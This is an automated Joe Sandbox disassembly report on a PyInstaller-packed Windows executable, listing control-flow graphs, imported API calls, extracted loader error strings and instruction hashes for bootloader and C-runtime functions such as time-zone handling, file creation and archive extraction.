LoadLibraryExW 18487->18488 18489 7ff67d0082a4 __std_exception_destroy 18488->18489 18489->16466 18491 7ff67d006f4c GetProcAddress 18490->18491 18492 7ff67d006f29 18490->18492 18491->18492 18493 7ff67d006f71 GetProcAddress 18491->18493 18494 7ff67d0029e0 57 API calls 18492->18494 18493->18492 18495 7ff67d006f96 GetProcAddress 18493->18495 18496 7ff67d006f3c 18494->18496 18495->18492 18497 7ff67d006fbe GetProcAddress 18495->18497 18496->16473 18497->18492 18498 7ff67d006fe6 GetProcAddress 18497->18498 18498->18492 18550 7ff67d005be0 18549->18550 18551 7ff67d001ef0 49 API calls 18550->18551 18552 7ff67d005c12 18551->18552 18553 7ff67d005c3b 18552->18553 18554 7ff67d005c1b 18552->18554 18556 7ff67d005c92 18553->18556 18558 7ff67d004060 49 API calls 18553->18558 18555 7ff67d002b30 59 API calls 18554->18555 18576 7ff67d005c31 18555->18576 18557 7ff67d004060 49 API calls 18556->18557 18559 7ff67d005cab 18557->18559 18560 7ff67d005c5c 18558->18560 18562 7ff67d005cc9 18559->18562 18566 7ff67d002b30 59 API calls 18559->18566 18563 7ff67d005c7a 18560->18563 18568 7ff67d002b30 59 API calls 18560->18568 18561 7ff67d00bdc0 _wfindfirst32i64 8 API calls 18565 7ff67d00346e 18561->18565 18567 7ff67d008270 58 API calls 18562->18567 18564 7ff67d003f70 57 API calls 18563->18564 18569 7ff67d005c84 18564->18569 18565->16487 18577 7ff67d005d30 18565->18577 18566->18562 18570 7ff67d005cd6 18567->18570 18568->18563 18569->18556 18574 7ff67d008270 58 API calls 18569->18574 18571 7ff67d005cfd 18570->18571 18572 7ff67d005cdb 18570->18572 18647 7ff67d0051f0 GetProcAddress 18571->18647 18575 7ff67d0029e0 57 API calls 18572->18575 18574->18556 18575->18576 18576->18561 18731 7ff67d004df0 18577->18731 18579 7ff67d005d54 18580 7ff67d005d6d 18579->18580 18581 7ff67d005d5c 18579->18581 18738 7ff67d004540 18580->18738 18582 7ff67d002b30 59 API calls 18581->18582 18588 7ff67d005d68 18582->18588 18585 7ff67d005d8a 18586 7ff67d005d79 18588->16489 18619 7ff67d005947 18618->18619 18619->18619 18648 7ff67d005212 18647->18648 18649 7ff67d005230 GetProcAddress 18647->18649 18652 7ff67d0029e0 57 API calls 18648->18652 18649->18648 18650 7ff67d005255 GetProcAddress 18649->18650 18650->18648 18651 7ff67d00527a GetProcAddress 18650->18651 18651->18648 18653 7ff67d0052a2 GetProcAddress 18651->18653 18654 7ff67d005225 18652->18654 18653->18648 18655 7ff67d0052ca GetProcAddress 18653->18655 18654->18576 18655->18648 18656 7ff67d0052f2 GetProcAddress 18655->18656 18656->18648 18657 7ff67d00531a GetProcAddress 18656->18657 18733 7ff67d004e15 18731->18733 18732 7ff67d004e1d 18732->18579 18733->18732 18736 7ff67d004faf 18733->18736 18773 7ff67d0170b8 18733->18773 18734 7ff67d00515a __std_exception_destroy 18734->18579 18735 7ff67d004260 47 API calls 18735->18736 18736->18734 18736->18735 18739 7ff67d004570 18738->18739 18740 7ff67d00bdc0 _wfindfirst32i64 8 API calls 18739->18740 18741 7ff67d0045d2 18740->18741 18741->18585 18741->18586 18774 7ff67d0170e8 18773->18774 18777 7ff67d0165b4 18774->18777 18776 7ff67d017118 18776->18733 18778 7ff67d0165f7 18777->18778 18779 7ff67d0165e5 18777->18779 18781 7ff67d016641 18778->18781 18783 7ff67d016604 18778->18783 18780 7ff67d0155c4 _findclose 11 API calls 18779->18780 18782 7ff67d0165ea 18780->18782 18784 7ff67d01665c 18781->18784 18788 7ff67d014a00 45 API calls 18781->18788 18786 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 18782->18786 18787 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 18783->18787 18789 7ff67d01667e 18784->18789 18798 7ff67d017040 18784->18798 18797 7ff67d0165f5 18786->18797 18787->18797 18788->18784 18790 7ff67d01671f 18789->18790 18791 7ff67d0155c4 _findclose 11 API calls 18789->18791 18790->18797 18797->18776 18799 7ff67d017063 18798->18799 18801 7ff67d01707a 18798->18801 18858 7ff67d01b810 __GetCurrentState 45 API calls 18857->18858 18859 7ff67d01aa71 18858->18859 18860 7ff67d01ab9c __GetCurrentState 45 API calls 18859->18860 18861 7ff67d01aa91 18860->18861 19849 7ff67d021e20 19860 7ff67d027db4 19849->19860 19861 7ff67d027dc1 19860->19861 19862 7ff67d01b00c __free_lconv_mon 11 API calls 19861->19862 19864 7ff67d027ddd 19861->19864 19862->19861 19863 7ff67d01b00c __free_lconv_mon 11 API calls 19863->19864 19864->19863 19865 7ff67d021e29 19864->19865 19866 7ff67d020db8 EnterCriticalSection 19865->19866

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 111 7ff67d026470-7ff67d0264ab call 7ff67d025df8 call 7ff67d025e00 call 7ff67d025e68 118 7ff67d0264b1-7ff67d0264bc call 7ff67d025e08 111->118 119 7ff67d0266d5-7ff67d026721 call 7ff67d01afc4 call 7ff67d025df8 call 7ff67d025e00 call 7ff67d025e68 111->119 118->119 124 7ff67d0264c2-7ff67d0264cc 118->124 145 7ff67d026727-7ff67d026732 call 7ff67d025e08 119->145 146 7ff67d02685f-7ff67d0268cd call 7ff67d01afc4 call 7ff67d021ce8 119->146 127 7ff67d0264ee-7ff67d0264f2 124->127 128 7ff67d0264ce-7ff67d0264d1 124->128 131 7ff67d0264f5-7ff67d0264fd 127->131 130 7ff67d0264d4-7ff67d0264df 128->130 133 7ff67d0264ea-7ff67d0264ec 130->133 134 7ff67d0264e1-7ff67d0264e8 130->134 131->131 135 7ff67d0264ff-7ff67d026512 call 7ff67d01dcbc 131->135 133->127 137 7ff67d02651b-7ff67d026529 133->137 134->130 134->133 142 7ff67d02652a-7ff67d026536 call 7ff67d01b00c 135->142 143 7ff67d026514-7ff67d026516 call 7ff67d01b00c 135->143 151 7ff67d02653d-7ff67d026545 142->151 143->137 145->146 155 7ff67d026738-7ff67d026743 call 7ff67d025e38 145->155 165 7ff67d0268db-7ff67d0268de 146->165 166 7ff67d0268cf-7ff67d0268d6 146->166 151->151 154 7ff67d026547-7ff67d026558 call 7ff67d020f54 151->154 154->119 163 7ff67d02655e-7ff67d0265b4 call 7ff67d00d1e0 * 4 call 7ff67d02638c 154->163 155->146 164 7ff67d026749-7ff67d02676c call 7ff67d01b00c GetTimeZoneInformation 155->164 223 7ff67d0265b6-7ff67d0265ba 163->223 182 7ff67d026772-7ff67d026793 164->182 183 7ff67d026834-7ff67d02685e call 7ff67d025df0 call 7ff67d025de0 call 7ff67d025de8 164->183 169 7ff67d0268e0 165->169 170 7ff67d026915-7ff67d026928 call 7ff67d01dcbc 165->170 167 7ff67d02696b-7ff67d02696e 166->167 173 7ff67d0268e3 167->173 174 7ff67d026974-7ff67d02697c call 7ff67d026470 167->174 169->173 188 7ff67d02692a 170->188 189 7ff67d026933-7ff67d02694e call 7ff67d021ce8 170->189 180 7ff67d0268e8-7ff67d026914 call 7ff67d01b00c call 7ff67d00bdc0 173->180 181 7ff67d0268e3 call 7ff67d0266ec 173->181 174->180 181->180 184 7ff67d02679e-7ff67d0267a5 182->184 185 7ff67d026795-7ff67d02679b 182->185 192 7ff67d0267a7-7ff67d0267af 184->192 193 7ff67d0267b9 184->193 185->184 196 7ff67d02692c-7ff67d026931 call 7ff67d01b00c 188->196 210 7ff67d026950-7ff67d026953 189->210 211 7ff67d026955-7ff67d026967 call 7ff67d01b00c 189->211 192->193 199 7ff67d0267b1-7ff67d0267b7 192->199 205 7ff67d0267bb-7ff67d02682f call 7ff67d00d1e0 * 4 call 7ff67d0232cc call 7ff67d026984 * 2 193->205 196->169 199->205 205->183 210->196 211->167 225 7ff67d0265bc 223->225 226 7ff67d0265c0-7ff67d0265c4 223->226 225->226 226->223 228 7ff67d0265c6-7ff67d0265eb call 7ff67d01716c 226->228 234 7ff67d0265ee-7ff67d0265f2 228->234 236 7ff67d026601-7ff67d026605 234->236 237 7ff67d0265f4-7ff67d0265ff 234->237 236->234 237->236 240 7ff67d026607-7ff67d02660b 237->240 242 7ff67d02660d-7ff67d026635 call 7ff67d01716c 240->242 243 7ff67d02668c-7ff67d026690 240->243 252 7ff67d026637 242->252 253 7ff67d026653-7ff67d026657 242->253 244 7ff67d026697-7ff67d0266a4 243->244 245 7ff67d026692-7ff67d026694 243->245 247 7ff67d0266a6-7ff67d0266bc call 7ff67d02638c 244->247 248 7ff67d0266bf-7ff67d0266ce call 7ff67d025df0 call 7ff67d025de0 244->248 245->244 247->248 248->119 254 7ff67d02663a-7ff67d026641 252->254 253->243 256 7ff67d026659-7ff67d026677 call 7ff67d01716c 253->256 254->253 258 7ff67d026643-7ff67d026651 254->258 263 7ff67d026683-7ff67d02668a 256->263 258->253 258->254 263->243 264 7ff67d026679-7ff67d02667d 263->264 264->243 265 7ff67d02667f 264->265 265->263
                                                                    APIs
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D0264B5
                                                                      • Part of subcall function 00007FF67D025E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E1C
                                                                      • Part of subcall function 00007FF67D01B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
                                                                      • Part of subcall function 00007FF67D01B00C: GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C
                                                                      • Part of subcall function 00007FF67D01AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67D01AFA3,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01AFCD
                                                                      • Part of subcall function 00007FF67D01AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67D01AFA3,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01AFF2
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D0264A4
                                                                      • Part of subcall function 00007FF67D025E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E7C
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D02671A
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D02672B
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D02673C
                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67D02697C), ref: 00007FF67D026763
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                    • API String ID: 3714727158-239921721
                                                                    • Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                    • Instruction ID: b405f68c904a057187e1824b9c7738ce78b87bdd98af129bfd44899dc0cafc42
                                                                    • Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                    • Instruction Fuzzy Hash: A2D1C027A2925286E720EF25D8446B96761EF44798F846B39EA4DC7A85FF3CF441C340

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 444 7ff67d0273bc-7ff67d02742f call 7ff67d0270f0 447 7ff67d027449-7ff67d027453 call 7ff67d018534 444->447 448 7ff67d027431-7ff67d02743a call 7ff67d0155a4 444->448 453 7ff67d02746e-7ff67d0274d7 CreateFileW 447->453 454 7ff67d027455-7ff67d02746c call 7ff67d0155a4 call 7ff67d0155c4 447->454 455 7ff67d02743d-7ff67d027444 call 7ff67d0155c4 448->455 457 7ff67d0274d9-7ff67d0274df 453->457 458 7ff67d027554-7ff67d02755f GetFileType 453->458 454->455 471 7ff67d02778a-7ff67d0277aa 455->471 461 7ff67d027521-7ff67d02754f GetLastError call 7ff67d015538 457->461 462 7ff67d0274e1-7ff67d0274e5 457->462 464 7ff67d027561-7ff67d02759c GetLastError call 7ff67d015538 CloseHandle 458->464 465 7ff67d0275b2-7ff67d0275b9 458->465 461->455 462->461 469 7ff67d0274e7-7ff67d02751f CreateFileW 462->469 464->455 478 7ff67d0275a2-7ff67d0275ad call 7ff67d0155c4 464->478 467 7ff67d0275bb-7ff67d0275bf 465->467 468 7ff67d0275c1-7ff67d0275c4 465->468 475 7ff67d0275ca-7ff67d02761f call 7ff67d01844c 467->475 468->475 476 7ff67d0275c6 468->476 469->458 469->461 483 7ff67d02763e-7ff67d02766f call 7ff67d026e70 475->483 484 7ff67d027621-7ff67d02762d call 7ff67d0272f8 475->484 476->475 478->455 489 7ff67d027671-7ff67d027673 483->489 490 7ff67d027675-7ff67d0276b7 483->490 484->483 491 7ff67d02762f 484->491 492 7ff67d027631-7ff67d027639 call 7ff67d01b184 489->492 493 7ff67d0276d9-7ff67d0276e4 490->493 494 7ff67d0276b9-7ff67d0276bd 490->494 491->492 492->471 497 7ff67d027788 493->497 498 7ff67d0276ea-7ff67d0276ee 493->498 494->493 496 7ff67d0276bf-7ff67d0276d4 494->496 496->493 497->471 498->497 500 7ff67d0276f4-7ff67d027739 CloseHandle CreateFileW 498->500 501 7ff67d02773b-7ff67d027769 GetLastError call 7ff67d015538 call 7ff67d018674 500->501 502 7ff67d02776e-7ff67d027783 500->502 501->502 502->497
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                    • String ID:
                                                                    • API String ID: 1617910340-0
                                                                    • Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                    • Instruction ID: 3b5ca3ca1a56b4a012f9c6c8b306aa6a5a56e985b4841559d047932dbbe27fce
                                                                    • Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                    • Instruction Fuzzy Hash: C8C1B133B25A4185EB10CF68C4946AC3B71FB89B98B512725DA6E9B794EF38F456C300

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF67D00154F), ref: 00007FF67D0079F7
                                                                      • Part of subcall function 00007FF67D007B70: GetEnvironmentVariableW.KERNEL32(00007FF67D003A1F), ref: 00007FF67D007BAA
                                                                      • Part of subcall function 00007FF67D007B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67D007BC7
                                                                      • Part of subcall function 00007FF67D017EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D017F05
                                                                    • SetEnvironmentVariableW.KERNEL32 ref: 00007FF67D007AB1
                                                                      • Part of subcall function 00007FF67D002B30: MessageBoxW.USER32 ref: 00007FF67D002C05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                    • API String ID: 3752271684-1116378104
                                                                    • Opcode ID: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
                                                                    • Instruction ID: 94401d2a0fa5efe9b5c2343b41db0b4db621e369dab1ba6887df2f6f5984e8c9
                                                                    • Opcode Fuzzy Hash: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
                                                                    • Instruction Fuzzy Hash: FA51BF13B3960391FA15FF2698292BE52916F89BC4F482A31DD4ECB797FD2DF9018240

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 777 7ff67d0266ec-7ff67d026721 call 7ff67d025df8 call 7ff67d025e00 call 7ff67d025e68 784 7ff67d026727-7ff67d026732 call 7ff67d025e08 777->784 785 7ff67d02685f-7ff67d0268cd call 7ff67d01afc4 call 7ff67d021ce8 777->785 784->785 790 7ff67d026738-7ff67d026743 call 7ff67d025e38 784->790 797 7ff67d0268db-7ff67d0268de 785->797 798 7ff67d0268cf-7ff67d0268d6 785->798 790->785 796 7ff67d026749-7ff67d02676c call 7ff67d01b00c GetTimeZoneInformation 790->796 811 7ff67d026772-7ff67d026793 796->811 812 7ff67d026834-7ff67d02685e call 7ff67d025df0 call 7ff67d025de0 call 7ff67d025de8 796->812 800 7ff67d0268e0 797->800 801 7ff67d026915-7ff67d026928 call 7ff67d01dcbc 797->801 799 7ff67d02696b-7ff67d02696e 798->799 804 7ff67d0268e3 799->804 805 7ff67d026974-7ff67d02697c call 7ff67d026470 799->805 800->804 817 7ff67d02692a 801->817 818 7ff67d026933-7ff67d02694e call 7ff67d021ce8 801->818 809 7ff67d0268e8-7ff67d026914 call 7ff67d01b00c call 7ff67d00bdc0 804->809 810 7ff67d0268e3 call 7ff67d0266ec 804->810 805->809 810->809 813 7ff67d02679e-7ff67d0267a5 811->813 814 7ff67d026795-7ff67d02679b 811->814 820 7ff67d0267a7-7ff67d0267af 813->820 821 7ff67d0267b9 813->821 814->813 824 7ff67d02692c-7ff67d026931 call 7ff67d01b00c 817->824 836 7ff67d026950-7ff67d026953 818->836 837 7ff67d026955-7ff67d026967 call 7ff67d01b00c 818->837 820->821 826 7ff67d0267b1-7ff67d0267b7 820->826 831 7ff67d0267bb-7ff67d02682f call 7ff67d00d1e0 * 4 call 7ff67d0232cc call 7ff67d026984 * 2 821->831 824->800 826->831 831->812 836->824 837->799
                                                                    APIs
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D02671A
                                                                      • Part of subcall function 00007FF67D025E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E7C
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D02672B
                                                                      • Part of subcall function 00007FF67D025E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E1C
                                                                    • _get_daylight.LIBCMT ref: 00007FF67D02673C
                                                                      • Part of subcall function 00007FF67D025E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E4C
                                                                      • Part of subcall function 00007FF67D01B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
                                                                      • Part of subcall function 00007FF67D01B00C: GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C
                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67D02697C), ref: 00007FF67D026763
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                    • API String ID: 1511944507-239921721
                                                                    • Opcode ID: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
                                                                    • Instruction ID: 290ab7e534fa56be02fb33b472efb74d6a518858df1809b06325954c7dbb6b80
                                                                    • Opcode Fuzzy Hash: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
                                                                    • Instruction Fuzzy Hash: 4151A337A2964286E710DF21E9805B96760FF59788F806B39EA4DC3A95FF3CF4008750
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                    • String ID:
                                                                    • API String ID: 1010374628-0
                                                                    • Opcode ID: 1d5e204d546ae96205e64be84d673fdd3b97ef7c0bf9eb79adc63bcf0b3d6b72
                                                                    • Instruction ID: 964ef3fb8bb937b16f9456f0587f6d74dc181d26317269e2dd1cd10648265336
                                                                    • Opcode Fuzzy Hash: 1d5e204d546ae96205e64be84d673fdd3b97ef7c0bf9eb79adc63bcf0b3d6b72
                                                                    • Instruction Fuzzy Hash: FE02AE23B2A64780FA61EF12980427D2694AF41B98F486F35ED6DD67D2FE7DF4018321

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff67d001710-7ff67d001724 1 7ff67d00173e-7ff67d001742 0->1 2 7ff67d001726-7ff67d00173d call 7ff67d002b30 0->2 4 7ff67d001744-7ff67d00174d call 7ff67d0012b0 1->4 5 7ff67d001768-7ff67d00178b call 7ff67d007c20 1->5 11 7ff67d00175f-7ff67d001767 4->11 12 7ff67d00174f-7ff67d00175a call 7ff67d002b30 4->12 13 7ff67d00178d-7ff67d0017b8 call 7ff67d002890 5->13 14 7ff67d0017b9-7ff67d0017d4 call 7ff67d003fe0 5->14 12->11 20 7ff67d0017ee-7ff67d001801 call 7ff67d010914 14->20 21 7ff67d0017d6-7ff67d0017e9 call 7ff67d002b30 14->21 27 7ff67d001823-7ff67d001827 20->27 28 7ff67d001803-7ff67d00181e call 7ff67d002890 20->28 26 7ff67d00192f-7ff67d001932 call 7ff67d01028c 21->26 36 7ff67d001937-7ff67d00194e 26->36 31 7ff67d001841-7ff67d001861 call 7ff67d015090 27->31 32 7ff67d001829-7ff67d001835 call 7ff67d001050 27->32 39 7ff67d001927-7ff67d00192a call 7ff67d01028c 28->39 40 7ff67d001863-7ff67d00187d call 7ff67d002890 31->40 41 7ff67d001882-7ff67d001888 31->41 37 7ff67d00183a-7ff67d00183c 32->37 37->39 39->26 49 7ff67d00191d-7ff67d001922 40->49 44 7ff67d001915-7ff67d001918 call 7ff67d01507c 41->44 45 7ff67d00188e-7ff67d001897 41->45 44->49 48 7ff67d0018a0-7ff67d0018c2 call 7ff67d0105dc 45->48 52 7ff67d0018f5-7ff67d0018fc 48->52 53 7ff67d0018c4-7ff67d0018dc call 7ff67d010d1c 48->53 49->39 54 7ff67d001903-7ff67d00190b call 7ff67d002890 52->54 58 7ff67d0018e5-7ff67d0018f3 53->58 59 7ff67d0018de-7ff67d0018e1 53->59 62 7ff67d001910 54->62 58->54 59->48 61 7ff67d0018e3 59->61 61->62 62->44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                    • API String ID: 2030045667-3833288071
                                                                    • Opcode ID: 9d00660957505973949e9b0dc0485c72f9dd8ba2b1c1ce84b66a71b4744f331c
                                                                    • Instruction ID: baf21834ac158e19460cf2a89384f9b8b96a70d3bf847cf037c79303583cebf5
                                                                    • Opcode Fuzzy Hash: 9d00660957505973949e9b0dc0485c72f9dd8ba2b1c1ce84b66a71b4744f331c
                                                                    • Instruction Fuzzy Hash: 9C518E62B39642A6EA10DF25E4502B967A0FF487D8F446A31DE4CC7699FE7CF244C710

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _fread_nolock$Message
                                                                    • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                    • API String ID: 677216364-1384898525
                                                                    • Opcode ID: a2596121b459bc349cfae4ca6f1de26d09299e69c8ea2ab67b8f34c93d039d3f
